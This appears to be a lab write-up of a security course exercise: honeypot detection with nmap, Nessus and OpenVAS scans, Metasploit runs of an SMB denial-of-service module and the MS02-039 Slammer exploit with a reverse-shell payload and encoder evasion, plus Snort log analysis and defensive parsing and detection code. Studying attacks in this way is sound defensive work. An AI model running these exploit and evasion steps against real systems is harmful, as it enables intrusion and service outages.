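PORT    STATE SERVICE      VERSION
23/tcp  open  tcpwrapped
25/tcp  open  tcpwrapped
80/tcp  open  tcpwrapped
139/tcp open  netbios-ssn?
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
Network Distance: 2 hops
"""

# One port-table row: "23/tcp  open  tcpwrapped" or "139/tcp open  netbios-ssn?  <version>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_report(text):
    """Return {'ports': [row dicts], 'os_match': bool} from Nmap normal output."""
    ports = []
    os_match = True
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": (version or "").strip()})
        elif line.startswith("No exact OS matches") or line.startswith("No OS matches"):
            os_match = False
    return {"ports": ports, "os_match": os_match}


def honeypot_indicators(report, wrapped_ratio=0.5):
    """List the tells found; wrapped_ratio is an assumed threshold, not an Nmap value."""
    open_ports = [p for p in report["ports"] if p["state"] == "open"]
    tells = []
    if open_ports:
        wrapped = [p for p in open_ports if p["service"] == "tcpwrapped"]
        if float(len(wrapped)) / len(open_ports) >= wrapped_ratio:
            tells.append("%d of %d open ports are tcpwrapped" % (len(wrapped), len(open_ports)))
        guessed = [p for p in open_ports if p["service"].endswith("?")]
        if guessed:
            tells.append("service guessed from port number only on: "
                         + ", ".join("%d/%s" % (p["port"], p["proto"]) for p in guessed))
    if not report["os_match"]:
        tells.append("no OS fingerprint match")
    return tells


if __name__ == "__main__":
    for tell in honeypot_indicators(parse_report(SAMPLE_REPORT)):
        print("tell:", tell)
```

Run against the report above it prints all three tells. None of them proves a honeypot on its own (a firewall that accepts and drops, or an unusual TCP stack, gives the same picture), but together they are what made the scan look wrong here.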

  • Scan it with Nessus and OpenVAS.
    • Do Nessus and OpenVAS think that it’s a real device?
/opt/nessus/bin/nessuscmd -q 145.100.105.197
Starting nessuscmd 4.2.1
Scanning '145.100.105.197'...

+ Results found on 145.100.105.197 :
   - Port telnet (23/tcp) is open
   - Port smtp (25/tcp) is open
   - Port http (80/tcp) is open
   - Port netbios-ns (137/tcp) is open
   - Port netbios-ssn (139/tcp) is open

sudo openvassd
All plugins loaded
sudo echo "145.100.105.196" >> iptoscan.txt
sudo OpenVAS-Client -q 127.0.0.1 9390 jeroen ids iptoscan.txt scanresults2.html -T html

Neither vulnerability scanner reports that it is a honeypot; both simply list the emulated ports as open. The only related thing that OpenVAS reports is that the OS is unknown. Two caveats about the OpenVAS run: the target file contains 145.100.105.196 (the honeyd host itself) rather than the honeypot address 145.100.105.197 that nmap and Nessus were pointed at, so for a like-for-like comparison the honeypot address should be scanned, and "sudo echo ... >> iptoscan.txt" redirects as the invoking user, not as root (sudo only applies to echo). Passing the OpenVAS password on the command line also leaves it in the shell history and visible in the process list.

We downloaded the Metasploit framework from:

http://www.metasploit.com/framework/download/

Then we installed the framework:

sudo sh framework-3.3.3-linux-i686.run

This installer will place Metasploit into the /opt/metasploit3 directory.
Continue (yes/no) > yes
Would you like to automatically update Metasploit?
AutoUpdate? (yes/no) > yes
Would you like to update Metasploit right now?
Update? (yes/no) > yes

sudo msfconsole
  • Try to exploit the weaknesses that are found with Nessus and OpenVAS.

We scanned a Windows 2003 Server for vulnerabilities. We enabled the following services:

  • RPC
  • Server
  • Netbios

Nessus gave the following results:

/opt/nessus/bin/nessuscmd 145.100.105.213
Starting nessuscmd 4.2.1
Scanning '145.100.105.213'...

+ Results found on 145.100.105.213 :
   - Port epmap (135/tcp) is open
   - Port netbios-ssn (139/tcp) is open
   - Port microsoft-ds (445/tcp) is open
   - Port blackjack (1025/tcp) is open
   - Port cap (1026/tcp) is open

The OpenVAS report (the screenshot is not reproduced here) listed two vulnerabilities.

The first one is a rather well-known vulnerability (MS09-001), and Metasploit has a module for it:

msf > search ms09_001
[*] Searching loaded modules for pattern 'ms09_001'...

Auxiliary
=========

   Name                            Rank    Description
   ----                            ----    -----------
   dos/windows/smb/ms09_001_write  normal  Microsoft SRV.SYS WriteAndX Invalid DataOffset

This is an auxiliary denial-of-service module: it tries to crash the SMB server with malformed WriteAndX requests and does not deliver a payload or return a shell. We ran it from msfconsole as follows:

msf > use auxiliary/dos/windows/smb/ms09_001_write
msf auxiliary(ms09_001_write) > set RHOST 145.100.105.213
RHOST => 145.100.105.213
msf auxiliary(ms09_001_write) > run

Attempting to crash the remote host...
datalenlow=65535 dataoffset=65535 fillersize=72
datalenlow=55535 dataoffset=65535 fillersize=72
datalenlow=45535 dataoffset=65535 fillersize=72
datalenlow=35535 dataoffset=65535 fillersize=72
datalenlow=25535 dataoffset=65535 fillersize=72
datalenlow=15535 dataoffset=65535 fillersize=72
datalenlow=65535 dataoffset=55535 fillersize=72
datalenlow=55535 dataoffset=55535 fillersize=72
datalenlow=45535 dataoffset=55535 fillersize=72
datalenlow=35535 dataoffset=55535 fillersize=72
datalenlow=25535 dataoffset=55535 fillersize=72
datalenlow=15535 dataoffset=55535 fillersize=72
datalenlow=65535 dataoffset=45535 fillersize=72
datalenlow=55535 dataoffset=45535 fillersize=72
datalenlow=45535 dataoffset=45535 fillersize=72
datalenlow=35535 dataoffset=45535 fillersize=72
datalenlow=25535 dataoffset=45535 fillersize=72
datalenlow=15535 dataoffset=45535 fillersize=72
datalenlow=65535 dataoffset=35535 fillersize=72
datalenlow=55535 dataoffset=35535 fillersize=72
datalenlow=45535 dataoffset=35535 fillersize=72
datalenlow=35535 dataoffset=35535 fillersize=72
datalenlow=25535 dataoffset=35535 fillersize=72
datalenlow=15535 dataoffset=35535 fillersize=72
datalenlow=65535 dataoffset=25535 fillersize=72
datalenlow=55535 dataoffset=25535 fillersize=72
datalenlow=45535 dataoffset=25535 fillersize=72
datalenlow=35535 dataoffset=25535 fillersize=72
datalenlow=25535 dataoffset=25535 fillersize=72
datalenlow=15535 dataoffset=25535 fillersize=72
datalenlow=65535 dataoffset=15535 fillersize=72
datalenlow=55535 dataoffset=15535 fillersize=72
datalenlow=45535 dataoffset=15535 fillersize=72
datalenlow=35535 dataoffset=15535 fillersize=72
datalenlow=25535 dataoffset=15535 fillersize=72
datalenlow=15535 dataoffset=15535 fillersize=72
[*] Auxiliary module execution completed
msf auxiliary(ms09_001_write) >

The module only walks through its combinations of datalenlow and dataoffset and reports that it finished; whether the target actually crashed is not in this output and has to be verified separately, for example by checking whether 445/tcp still answers. While it ran I checked the Snort log. It gave me a lot of output, all similar to the records below:

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:22.055795 145.100.102.131:60094 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:23121 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC09C71C9  Ack: 0xFB04529A  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5387669 6519

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:22.225651 145.100.102.131:57008 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:54200 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC067E8AA  Ack: 0xBE5EFED  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5387711 6521
...
...
...

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:28.856311 145.100.102.131:51774 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:9359 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC65D1B40  Ack: 0x5842F684  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5389369 6587

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:29.006929 145.100.102.131:46062 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:23546 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC6B16A51  Ack: 0x7395A1E4  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5389407 6589

Note what Snort actually matched: SID 2465 fires on the IPC$ tree connect that precedes every WriteAndX attempt, a generic event that any SMB client produces, not on the malformed request itself. What makes it stand out here is the volume and the pattern: one alert per attempt, each from a new source port, i.e. a fresh TCP connection for every try, within a few seconds. More information about this module: http://www.metasploit.com/modules/auxiliary/dos/windows/smb/ms09_001_write
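To reduce "a lot of output, all similar" to something readable, the following Python (an added example, not part of the original write-up) parses Snort's full alert format, the multi-line records shown above, and groups them per signature and flow, also counting the distinct source ports, which here exposes the one-connection-per-attempt pattern. The sample input is the four records above.

```python
"""Summarise Snort "full" alert output by signature and flow.

Added example, not from the original write-up. Each record consists of a
header "[**] [gid:sid:rev] message [**]", a classification/priority line,
a timestamp/endpoint line and per-protocol detail lines; records are
separated by a blank line. Only the first three lines are parsed here.
"""
import re
from collections import OrderedDict

# Sample input: the four alert records shown above.
SAMPLE_ALERTS = """\
[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:22.055795 145.100.102.131:60094 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:23121 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC09C71C9  Ack: 0xFB04529A  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5387669 6519

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:22.225651 145.100.102.131:57008 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:54200 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC067E8AA  Ack: 0xBE5EFED  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5387711 6521

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:28.856311 145.100.102.131:51774 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:9359 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC65D1B40  Ack: 0x5842F684  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5389369 6587

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:29.006929 145.100.102.131:46062 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:23546 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC6B16A51  Ack: 0x7395A1E4  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5389407 6589
"""

HEADER_RE = re.compile(r"^\[\*\*\] \[(\d+):(\d+):(\d+)\] (.*?) \[\*\*\]$")
CLASS_RE = re.compile(r"^\[Classification: (.*?)\] \[Priority: (\d+)\]$")
# Ports are optional so that ICMP alerts ("src -> dst" without ports) parse too.
FLOW_RE = re.compile(r"^(\d\d/\d\d-\d\d:\d\d:\d\d\.\d+) (\S+?)(?::(\d+))? -> (\S+?)(?::(\d+))?$")


def parse_alerts(text):
    """Return one dict per alert record, in file order."""
    alerts = []
    current = None
    for line in text.splitlines():
        h = HEADER_RE.match(line)
        if h:
            current = {"gid": int(h.group(1)), "sid": int(h.group(2)),
                       "rev": int(h.group(3)), "msg": h.group(4)}
            alerts.append(current)
            continue
        if current is None:
            continue
        c = CLASS_RE.match(line)
        if c:
            current["classification"] = c.group(1)
            current["priority"] = int(c.group(2))
            continue
        f = FLOW_RE.match(line)
        if f:
            current["time"] = f.group(1)
            current["src"] = f.group(2)
            current["sport"] = int(f.group(3)) if f.group(3) else None
            current["dst"] = f.group(4)
            current["dport"] = int(f.group(5)) if f.group(5) else None
    return alerts


def summarize(alerts):
    """Group by (gid, sid, msg, src, dst, dport): count, time span, distinct source ports."""
    summary = OrderedDict()
    for a in alerts:
        key = (a["gid"], a["sid"], a["msg"], a["src"], a["dst"], a.get("dport"))
        entry = summary.setdefault(key, {"count": 0, "first": a["time"], "last": a["time"],
                                         "priority": a.get("priority"), "sports": set()})
        entry["count"] += 1
        entry["last"] = a["time"]          # records are in chronological order
        entry["sports"].add(a.get("sport"))
    return summary


if __name__ == "__main__":
    for key, e in summarize(parse_alerts(SAMPLE_ALERTS)).items():
        gid, sid, msg, src, dst, dport = key
        print("%d:%d %-40s %s -> %s:%s  x%d  %d src ports  %s .. %s"
              % (gid, sid, msg, src, dst, dport, e["count"], len(e["sports"]), e["first"], e["last"]))
```

On the four records above this collapses to a single line: 4 alerts, 4 distinct source ports, between 15:53:22 and 15:53:29. The same summary over the full log would show one source port per WriteAndX attempt, which is the part of the picture that the individual alerts hide.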

  • Launch a well known UDP based MSSQL attack against your VM.
    • Doesn’t matter whether MSSQL is installed or not.

We tried a few other exploits first, but they did not work out. Those attacks were TCP based: with no service listening, the target answers the SYN with a RST and the exploit never gets to send anything. The following attack is UDP based, so the packet goes out regardless of whether anything listens on 1434/udp:

msf > use windows/mssql/ms02_039_slammer
msf exploit(ms02_039_slammer) > show options

Module options:

   Name        Current Setting                                Required  Description
   ----        ---------------                                --------  -----------
   HEX2BINARY  /opt/metasploit3/msf3/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
   MSSQL_PASS                                                 no        The password for the specified username
   MSSQL_USER  sa                                             no        The username to authenticate as
   RHOST                                                      yes       The target address
   RPORT       1434                                           yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   MSSQL 2000 / MSDE <= SP2

msf exploit(ms02_039_slammer) > set rhost 145.100.105.196
rhost => 145.100.105.196
msf exploit(ms02_039_slammer) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms02_039_slammer) > set lhost 145.100.102.131
lhost => 145.100.102.131
msf exploit(ms02_039_slammer) > show options

Module options:

   Name        Current Setting                                Required  Description
   ----        ---------------                                --------  -----------
   HEX2BINARY  /opt/metasploit3/msf3/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
   MSSQL_PASS                                                 no        The password for the specified username
   MSSQL_USER  sa                                             no        The username to authenticate as
   RHOST       145.100.105.196                                yes       The target address
   RPORT       1434                                           yes       The target port

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     145.100.102.131  yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   MSSQL 2000 / MSDE <= SP2

msf exploit(ms02_039_slammer) > exploit

[*] Started reverse handler on port 4444
[*] Sending UDP packet with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Exploit completed, but no session was created.

The exploit ran to completion: the UDP packet was sent. As the last line says, though, no session was created, which is expected here because the target (145.100.105.196, our Linux VM) does not run SQL Server 2000, so there is nothing to overflow. For this exercise that does not matter; the point is that the attack traffic reached the VM and the sensor.

  • Is this action detected by Snort?

No, nothing was detected by Snort: the ruleset in use had no signature that matched this datagram.
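The following Python is an added example (not from the original write-up and not a Snort rule) of the detection logic one would write for this traffic. Per the module description quoted further down, the trigger is a UDP/1434 datagram that starts with 0x04 followed by a long string. In the SQL Server Resolution Protocol, 0x04 (CLNT_UCAST_INST) is also a legitimate single-instance lookup carrying a short instance name, so the check keys on the length of that name rather than on the opcode alone. The 32-byte instance-name limit is an assumption, and the sample datagrams are constructed, not captured.

```python
"""Classify UDP/1434 (SQL Server Resolution Protocol) datagrams.

Added example, not part of the original write-up. Opcodes: 0x02 and 0x03
are one-byte instance enumeration requests; 0x04 is a lookup of one
instance by name. A legitimate name is short; the MS02-039 trigger is the
same opcode followed by a long string. MAX_INSTANCE_NAME is assumed.
"""

MAX_INSTANCE_NAME = 32   # assumed upper bound for a legitimate instance name


def classify_ssrp(payload):
    """Return (verdict, reason) for one datagram payload; verdict is benign/suspicious/unknown."""
    if not payload:
        return ("unknown", "empty datagram")
    opcode, body = payload[0], payload[1:]
    if opcode in (0x02, 0x03) and len(body) == 0:
        return ("benign", "instance enumeration request")
    if opcode == 0x04:
        name = body.split(b"\x00", 1)[0]          # instance name is NUL-terminated
        if len(name) > MAX_INSTANCE_NAME:
            return ("suspicious", "CLNT_UCAST_INST with %d-byte instance name" % len(name))
        return ("benign", "CLNT_UCAST_INST for instance %r" % name.decode("latin-1"))
    return ("unknown", "opcode 0x%02x, %d bytes" % (opcode, len(payload)))


# Constructed sample datagrams (not captured traffic).
SAMPLES = [
    ("browse", b"\x02"),
    ("lookup", b"\x04SQLEXPRESS\x00"),
    ("oversized", b"\x04" + b"A" * 96 + b":1"),   # long string ending in colon and number, as described
]


def triage(samples):
    """Verdict per labelled sample."""
    return [(label, classify_ssrp(data)[0]) for label, data in samples]


if __name__ == "__main__":
    for label, data in SAMPLES:
        print(label, classify_ssrp(data))
```

The same check as a local Snort 2 rule (assuming SID 1000001 is unused in your local.rules) would be: alert udp any any -> any 1434 (msg:"SSRP CLNT_UCAST_INST oversized instance name"; content:"|04|"; depth:1; dsize:>33; sid:1000001; rev:1;). dsize counts the opcode byte, hence the threshold of 33 for a 32-byte name.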

  • Try different encoders using Metasploit evasion options / msfencode.
    • what is Snort telling you?
msf > use windows/mssql/ms02_039_slammer
msf exploit(ms02_039_slammer) > set rhost 145.100.105.196
rhost => 145.100.105.196
msf exploit(ms02_039_slammer) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms02_039_slammer) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai
msf exploit(ms02_039_slammer) > set EnableContextEncoding 1
EnableContextEncoding => 1
msf exploit(ms02_039_slammer) > set ContectInformationFile application.map
ContectInformationFile => application.map
msf exploit(ms02_039_slammer) > set lhost 145.100.102.131
lhost => 145.100.102.131
msf exploit(ms02_039_slammer) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.

Two things to note in that run. First, the option is misspelled: msfconsole accepts "set ContectInformationFile" as an arbitrary datastore variable, but the real option is ContextInformationFile, so the context file was never picked up while EnableContextEncoding was on. Second, the error itself means the following: the payloads available are determined by the memory "Space" the exploit has for them, and the encoder must produce an encoded payload that fits in that space.

msf exploit(ms02_039_slammer) > info

       Name: Microsoft SQL Server Resolution Overflow
    Version: 7724
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Good

Provided by:
  hdm <hdm@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   MSSQL 2000 / MSDE <= SP2

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   no        The password for the specified username
  RHOST     145.100.105.196  yes       The target address
  RPORT     1434             yes       The target port
  USERNAME  sa               no        The username to authenticate as

Payload information:
  Space: 512
  Avoid: 6 characters

Description:
  This is an exploit for the SQL Server 2000 resolution service buffer
  overflow. This overflow is triggered by sending a udp packet to port
  1434 which starts with 0x04 and is followed by long string
  terminating with a colon and a number. This module should work
  against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649

http://www.osvdb.org/4578

http://www.securityfocus.com/bid/5310

http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx

Here the payload space is "Space: 512". The target application also does not allow certain characters to be used (usually at least the null byte 0x00, which terminates a C string); "Avoid: 6 characters" means the encoded payload may not contain six specific byte values. When the exploit runs, the encoder tries to fit the chosen payload, plus its own decoder stub, into those 512 bytes without using any of the six bytes. This is not always possible, and then the result is the error "No encoders encoded the buffer successfully". I tried a few other payloads, but this resulted in nothing.
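The following Python is an added example (not part of the original write-up, and not Metasploit's encoder) of the constraint that error reports. It uses a single-byte XOR encoder for illustration: a key is chosen so that neither the key nor any encoded byte is a bad character, a decoder stub is added, and the result is checked against the Space limit. shikata_ga_nai is polymorphic and multi-byte, but the fit test is the same. The 27-byte stub size, the six bad characters and the stand-in payloads are assumptions; the module above only reports the count of bad characters.

```python
"""Why an encoder run can fail: bad characters and payload space.

Added example, not Metasploit code. A single-byte XOR encoder stands in for
shikata_ga_nai; STUB_SIZE and BAD_CHARS are assumed values.
"""

STUB_SIZE = 27                              # assumed decoder-stub overhead in bytes
BAD_CHARS = b"\x00\x0a\x0d\x20\x2e\x3a"     # assumed set of six bytes the target rejects

# Constructed stand-ins for payloads (not real shellcode):
# a 300-byte buffer that only uses byte values 0x00..0x3f (so it contains bad chars),
# and a buffer that uses every byte value, which no single-byte XOR key can clean.
PAYLOAD = bytes((i * 13) % 64 for i in range(300))
ALL_BYTES = bytes(range(256))


def xor_encode(data, key):
    """Single-byte XOR; applying it twice with the same key decodes."""
    return bytes(b ^ key for b in data)


def has_bad_chars(data, bad=BAD_CHARS):
    return any(b in bad for b in data)


def find_key(payload, bad=BAD_CHARS):
    """First key whose own byte and whose encoded output avoid every bad char, else None."""
    for key in range(1, 256):
        if key in bad:                      # the key lives in the decoder stub, so it must be clean too
            continue
        if not has_bad_chars(xor_encode(payload, key), bad):
            return key
    return None


def try_encode(payload, space, bad=BAD_CHARS, stub_size=STUB_SIZE):
    """Mimic the framework's decision: send raw if clean, else encode; then check Space."""
    if not has_bad_chars(payload, bad):
        buf, key = payload, None
    else:
        key = find_key(payload, bad)
        if key is None:
            return {"ok": False, "reason": "No encoders encoded the buffer successfully"}
        buf = xor_encode(payload, key)
    total = len(buf) + (stub_size if key is not None else 0)
    if total > space:
        return {"ok": False, "reason": "encoded buffer is %d bytes, Space is %d" % (total, space)}
    return {"ok": True, "key": key, "size": total}


if __name__ == "__main__":
    print(try_encode(PAYLOAD, 512))         # fits: 300 + 27 bytes, key 0x40
    print(try_encode(PAYLOAD, 300))         # same payload, too little Space
    print(try_encode(ALL_BYTES, 512))       # no key avoids the bad chars
```

The three runs show the three ways the same error surfaces: the payload fits once encoded, the encoded payload plus stub exceeds Space, or no key exists that keeps every byte out of the bad set. With a real encoder the search space is larger and the stub is itself randomised, but the budget (Space) and the forbidden bytes (Avoid) are exactly the two numbers the module's info output reports.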